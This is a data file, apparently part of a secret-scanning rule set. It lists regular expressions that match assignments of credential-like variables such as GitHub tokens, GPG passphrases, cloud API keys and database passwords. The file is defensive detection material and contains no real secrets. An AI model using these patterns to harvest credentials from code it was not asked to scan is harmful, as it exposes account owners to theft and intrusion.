"(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?droplet[_-]?travis[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dropbox[_-]?oauth[_-]?bearer[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?doordash[_-]?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dockerhubpassword[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dockerhub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?postgres[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?passwd[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?docker[_-]?hub[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?ids[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?ssh[_-]?key[_-]?body[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?digitalocean[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?dgpg[_-]?passphrase[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?secure[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?deploy[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddgc[_-]?github[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddg[_-]?test[_-]?email[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?ddg[_-]?test[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?pw[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?db[_-]?connection[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?datadog[_-]?app[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?datadog[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?user[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?port[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?database[_-]?host[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?danger[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cypress[_-]?record[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coverity[_-]?scan[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coveralls[_-]?api[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cos[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conversation[_-]?username[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conversation[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?v2[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?test[_-]?org[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?php[_-]?management[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[_-]?new[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?management[_-]?api[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?integration[_-]?management[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?cma[_-]?test[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?contentful[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?consumerkey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?consumer[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?conekta[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?coding[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codecov[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codeclimate[_-]?repo[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?codacy[_-]?project[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cocoapods[_-]?trunk[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cocoapods[_-]?trunk[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cn[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cn[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clu[_-]?ssh[_-]?private[_-]?key[_-]?base64[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clu[_-]?repo[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudinary[_-]?url[_-]?staging[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudinary[_-]?url[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?auth[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?auth[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudflare[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?service[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?processed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?parsed[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?order[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?instance[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?audited[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloudant[_-]?archived[_-]?database[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cloud[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?clojars[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?cli[_-]?e2e[_-]?cma[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?claimr[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - 